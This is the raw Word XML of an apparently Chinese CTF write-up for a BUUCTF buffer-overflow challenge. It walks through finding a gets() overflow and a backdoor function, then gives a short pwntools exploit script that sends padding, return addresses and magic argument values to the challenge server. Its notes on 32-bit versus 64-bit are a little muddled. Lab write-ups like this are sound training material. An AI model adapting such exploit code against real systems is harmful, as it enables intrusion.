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1452" w14:textId="665E32F6" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7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checksec和file一遍文件放入64位ida中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70796F" w14:textId="77777777" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7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f5main函数，gets是可以打出溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB3203" w14:textId="48EF8DB6" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B2A7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0193DA2F" wp14:editId="1E2461ED">
            <wp:extent cx="5274310" cy="1635125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1303812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2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5307" w14:textId="1D18C4FF" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>溢出距离是0x38，属于外平址不需要覆盖4个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="003B2A7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07815627" wp14:editId="5BEBD19B">
            <wp:extent cx="5274310" cy="2501900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1900705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5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798E" w14:textId="29A4E2A3" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B2A7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84C60C4" wp14:editId="4E651D3B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>63500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>279400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3660775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21469"/>
                <wp:lineTo x="21532" y="21469"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="309056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564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找到后门函数需要满足a1和a2的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3AFD7" w14:textId="5AD17148" w:rsidR="003B2A7D" w:rsidRDefault="003B2A7D" w:rsidP="003B2A7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因为里面有fopen函数，需要程序退出才会有回显，所以要加上exit的地址</w:t>
      </w:r>
      <w:r w:rsidR="00E96FFF" w:rsidRPr="00E96FFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF3CA79" wp14:editId="36AB4C57">
            <wp:extent cx="4829849" cy="3210373"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="71963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3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6D85" w14:textId="4B80F3FA" w:rsidR="00E96FFF" w:rsidRDefault="00E96FFF" w:rsidP="003B2A7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wp写为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3F486" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735888C6" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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io = remote("node5.buuoj.cn",25076)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26841ACD" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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payload = b'a'*56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35050284" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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payload += p32(0x080489A0) + p32(0x0804E6A0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E45D7" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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payload += p32(0x308CD64F) + p32(0x195719D1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A1250" w14:textId="77777777" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="006626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io.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFFAB6" w14:textId="496D4C4C" w:rsidR="00662612" w:rsidRDefault="00662612" w:rsidP="00662612">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5E57A" w14:textId="5BFCEDB4" w:rsidR="00CD6713" w:rsidRDefault="00CD6713" w:rsidP="00CD6713">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这道题是32位可以理解为先构建结构再传参，如果是64位则是一边传参一遍构建结构</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CD6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956E9" w14:textId="77777777" w:rsidR="00552761" w:rsidRDefault="00552761" w:rsidP="00CD67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7860EC" w14:textId="77777777" w:rsidR="00552761" w:rsidRDefault="00552761" w:rsidP="00CD67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13E2F" w14:textId="77777777" w:rsidR="00552761" w:rsidRDefault="00552761" w:rsidP="00CD67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6FD8D7" w14:textId="77777777" w:rsidR="00552761" w:rsidRDefault="00552761" w:rsidP="00CD67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C3292"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E92169A"/>
    <w:lvl w:ilvl="0" w:tplc="EB3E3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496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7D"/>
    <w:rsid w:val="003B2A7D"/>
    <w:rsid w:val="0045302F"/>
    <w:rsid w:val="00552761"/>
    <w:rsid w:val="005A500B"/>
    <w:rsid w:val="00662612"/>
    <w:rsid w:val="00CD6713"/>
    <w:rsid w:val="00E9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AE93A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60DD28E8-3755-463F-B252-CE78DB02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A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A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A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A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A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A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A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A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2A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2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2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2A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2A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2A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2A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2A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2A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2A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2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A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2A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2A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A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2A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2A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2A7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67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67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67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67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105</Words>
  <Characters>275</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>14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8615399469665</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-01T09:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-17T03:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>